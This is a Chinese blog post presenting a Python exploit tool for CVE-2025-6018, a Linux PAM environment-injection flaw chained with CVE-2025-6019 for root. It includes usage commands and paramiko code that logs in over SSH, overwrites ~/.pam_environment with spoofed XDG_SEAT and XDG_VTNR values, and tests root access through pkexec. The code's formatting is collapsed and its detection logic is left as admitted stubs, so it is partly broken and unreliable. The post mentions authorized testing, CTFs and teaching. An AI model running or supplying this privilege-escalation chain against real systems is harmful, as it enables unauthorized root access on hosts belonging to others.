news 2026/6/10 0:31:03

Linux PAM环境变量注入漏洞利用工具解析

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Linux PAM环境变量注入漏洞利用工具解析

项目标题与描述

本项目提供了一个针对CVE-2025-6018漏洞的专业利用工具。该漏洞存在于Linux PAM(Pluggable Authentication Modules)的pam_env.so模块中,允许通过~/.pam_environment文件注入环境变量,进而通过SystemD会话操纵实现本地权限提升。结合CVE-2025-6019漏洞,攻击者可以进一步获得完整的root权限。

该工具通过SSH连接到目标主机,自动化执行漏洞检测和利用过程,支持openSUSE Leap 15、SUSE Linux Enterprise 15等多个Linux发行版。

功能特性

  • 自动化漏洞检测:自动检查目标系统上PAM的版本、配置文件顺序以及相关模块的存在情况。
  • 版本匹配验证:内置易受攻击的PAM版本列表(1.3.0 - 1.6.0),进行精确匹配。
  • 利用链执行:自动化实现CVE-2025-6018和CVE-2025-6019的完整攻击链,包括环境变量注入和后续权限提升。
  • 详细日志记录:将整个利用过程(包括时间戳、级别和信息)记录到文件并输出到控制台,便于分析和调试。
  • 参数化配置:支持通过命令行参数灵活指定目标IP、用户名和密码,易于集成到自动化工作流中。
  • 专业错误处理:包含SSH连接、命令执行和文件操作等环节的异常处理,提高工具的健壮性。

安装指南

系统要求

  • Python 3.x
  • 操作系统:支持Python的任意操作系统(Linux, macOS, Windows等),用于作为攻击发起端。
  • 目标系统:运行易受攻击版本(1.3.0 - 1.6.0)PAM的Linux主机。

依赖安装

本工具核心依赖为paramiko库(版本需>=2.12.0)用于建立SSH连接。

使用pip安装依赖:

pipinstallparamiko>=2.12.0

获取工具

直接从提供的源代码文件开始使用,无需其他编译或构建步骤。确保您拥有cve_2025_6018_professional.py文件的执行权限。

chmod+x cve_2025_6018_professional.py

使用说明

基础使用

通过命令行参数指定目标主机信息并运行脚本:

python3 cve_2025_6018_professional.py -i192.168.1.100 -u vulnerable_user -p user_password

参数详解

  • -i--ip: 目标主机的IP地址(必需)。
  • -u--username: 用于登录目标主机的用户名(必需)。
  • -p--password: 对应用户的密码(必需)。

工作流程

  1. 初始化与连接:工具初始化日志和漏洞版本数据,并尝试通过提供的凭据建立到目标主机的SSH连接。
  2. 漏洞评估:在目标主机上执行一系列命令,检查PAM版本、/etc/pam.d/目录下的配置文件(特别是sshd)中pam_env.sopam_systemd.so模块的顺序,以及SystemD版本。
  3. 条件判断:如果检测到pam_env.sopam_systemd.so之前被调用,并且PAM版本在受影响范围内,则判定存在漏洞。
  4. 利用执行:如果存在漏洞,工具将尝试在用户目录下创建或修改~/.pam_environment文件,注入XDG_SEAT=seat0XDG_VTNR=1等环境变量,以欺骗系统将其会话识别为本地活动会话。
  5. 权限提升:利用伪造的“活动用户”身份,结合Polkit的allow_active策略,尝试执行需要特权(如挂载操作)的命令。如果系统中还存在CVE-2025-6019漏洞(涉及udisks2/libblockdev),则可能进一步利用该漏洞获得root shell。

典型场景

该工具主要用于渗透测试人员和安全研究人员在获得授权的前提下,对内部Linux系统进行安全评估,验证系统是否受此CVE影响以及实际风险等级。也可用于CTF(Capture The Flag)竞赛或安全教学演示本地权限提升漏洞的利用原理。

核心代码

以下是工具中部分核心功能的代码实现及详细注释:

importparamikoimporttimeimportsysimportsocketimportargparseimportloggingfromdatetimeimportdatetime# 配置日志记录系统,将日志同时输出到文件和控制台,便于跟踪利用过程logging.basicConfig(level=logging.INFO,format='%(asctime)s [%(levelname)s] %(message)s',datefmt='%Y-%m-%d %H:%M:%S',handlers=[logging.FileHandler('cve_2025_6018_exploit.log'),logging.StreamHandler(sys.stdout)])logger=logging.getLogger(__name__)classCVEExploit:def__init__(self):# 定义已知易受攻击的PAM版本范围self.vulnerable_versions=["pam-1.3.0","pam-1.3.1","pam-1.4.0","pam-1.5.0","pam-1.5.1","pam-1.5.2","pam-1.5.3","pam-1.6.0"]defcheck_vulnerability(self,client):"""增强的漏洞检测函数,通过SSH客户端在远程主机执行多项检查"""logger.info("Starting vulnerability assessment")# 定义需要执行的检查命令字典checks={"pam_version":"rpm -q pam || dpkg -l | grep libpam",# 检查PAM安装包版本"pam_env":"find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null",# 查找使用pam_env的PAM配置"pam_systemd":"find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null",# 查找使用pam_systemd的PAM配置"systemd_version":"systemctl --version | head -1"# 检查SystemD版本}vulnerable=Falseforcheck_name,commandinchecks.items():try:# 通过SSH连接执行命令stdin,stdout,stderr=client.exec_command(command)output=stdout.read().decode('utf-8').strip()error=stderr.read().decode('utf-8').strip()ifoutput:logger.info(f"{check_name}:{output}")# 关键逻辑:检查pam_env是否在pam_systemd之前被加载ifcheck_name=="pam_env"and"sshd"inoutput:# 这里需要进一步分析/etc/pam.d/sshd文件的具体行顺序# 简化示例:假设检测到该文件即进行下一步详细检查logger.warning("pam_env found in sshd config. Checking order...")# 实际代码中应添加解析文件判断顺序的逻辑eliferror:logger.debug(f"{check_name}error:{error}")else:logger.debug(f"{check_name}: No output")exceptExceptionase:logger.error(f"Failed to execute{check_name}check:{e}")# 版本匹配逻辑(示例框架)# 实际应从`pam_version`检查的输出中提取版本号与`vulnerable_versions`列表对比logger.info("Vulnerability check completed.")# 返回True/False表示漏洞是否存在returnvulnerable
defexploit(self,client,username):"""执行漏洞利用的主要函数,尝试注入环境变量并提升权限"""logger.info(f"Attempting exploit for user:{username}")# 1. 创建或修改 ~/.pam_environment 文件,注入恶意环境变量pam_env_content=""" # Injected by CVE-2025-6018 exploit XDG_SEAT=seat0 XDG_VTNR=1 # 可添加其他用于欺骗会话类型的变量 """pam_env_path=f"/home/{username}/.pam_environment"# 假设用户主目录在/home下try:# 通过SSH将内容写入文件command=f"echo '{pam_env_content}' >{pam_env_path}"stdin,stdout,stderr=client.exec_command(command)# 检查命令是否成功执行exit_status=stdout.channel.recv_exit_status()ifexit_status==0:logger.info(f"Successfully created/overwritten{pam_env_path}")else:error=stderr.read().decode()logger.error(f"Failed to write pam_environment:{error}")returnFalseexceptExceptionase:logger.error(f"Error during file creation:{e}")returnFalse# 2. 触发PAM重新读取环境变量(例如,通过建立新的SSH会话或重新登录)# 注意:在实际利用中,可能需要用户注销并重新登录,或者工具需要创建新的SSH连接来触发新会话。logger.warning("Environment variable injected. A new login session (e.g., new SSH connection) may be required for the changes to take effect.")# 3. 尝试利用伪造的“活动用户”身份执行特权操作(示例:通过pkexec)# 这需要结合CVE-2025-6019或其它Polkit策略# 示例命令:尝试运行一个需要`allow_active`权限的Polkit动作test_command="pkexec --user root whoami"# 只是一个示例,实际命令取决于目标策略try:stdin,stdout,stderr=client.exec_command(test_command)output=stdout.read().decode().strip()error=stderr.read().decode().strip()ifoutput=="root":logger.critical("SUCCESS: Obtained root privileges!")# 可以在此处提供交互式shell或执行后续payloadreturnTrueelse:logger.info("Exploit attempted, but root not obtained. Output: %s, Error: %s",output,error)returnFalseexceptExceptionase:logger.error(f"Failed to execute privilege test:{e}")returnFalse

6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAM1WcosLlSccXIf2HKuEYUi
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/9 23:15:42

6005BZ10000控制板

6005BZ10000 控制板是一种工业控制模块,通常用于 ABB MOD 300 系列或类似工控系统中。它本身不是独立运行的板子,而是作为机架系统里的功能模块,用于处理特定的数据或控制功能。基本信息型号:6005BZ10000类型:D/F 模块…

作者头像 李华
网站建设 2026/6/7 10:45:52

AbMole | 化学物质来源可变性为内分泌干扰评估带来新挑战

阿特拉津作为一种广泛使用的除草剂,其潜在的内分泌干扰特性一直是毒理学研究中的焦点。经济合作与发展组织(OECD)为了标准化评估化学物质的内分泌干扰潜力,已经接受了一系列体外测试方法。在这些方法中,OECD 455和OECD…

作者头像 李华
网站建设 2026/6/7 10:45:52

AbMole | 全合成纳米纤维水凝胶实现卵巢癌类器官无酶释放

在临床前癌症研究中,能够高度模拟患者肿瘤组织病理学特征、基因表达谱和对外界刺激应答的三维体外模型,其价值不言而喻。患者来源肿瘤类器官(PTOs)正是这样一种强大的工具,它源于患者自身的肿瘤细胞,在体外…

作者头像 李华
网站建设 2026/6/9 18:37:33

学霸同款9个AI论文软件,专科生搞定毕业论文+格式规范!

学霸同款9个AI论文软件,专科生搞定毕业论文格式规范! AI 工具助力论文写作,让专科生也能轻松应对毕业挑战 在当今快节奏的学习环境中,专科生们常常面临一个共同的难题——如何高效完成毕业论文。尤其是在论文撰写过程中&#xff0…

作者头像 李华
网站建设 2026/6/9 19:46:02

收藏备用!AI大模型驱动制造业数字化转型:3大赋能方式+4类模型实战案例

对于刚接触大模型的程序员或行业小白来说,理解AI如何重塑制造业是入门的关键一步。本文将通俗拆解核心逻辑:AI大模型主要通过直接赋能、场景化定制、任务化定制三大路径推动制造业数字化转型。我们会先理清易混淆的AI概念,再深入分析大模型的…

作者头像 李华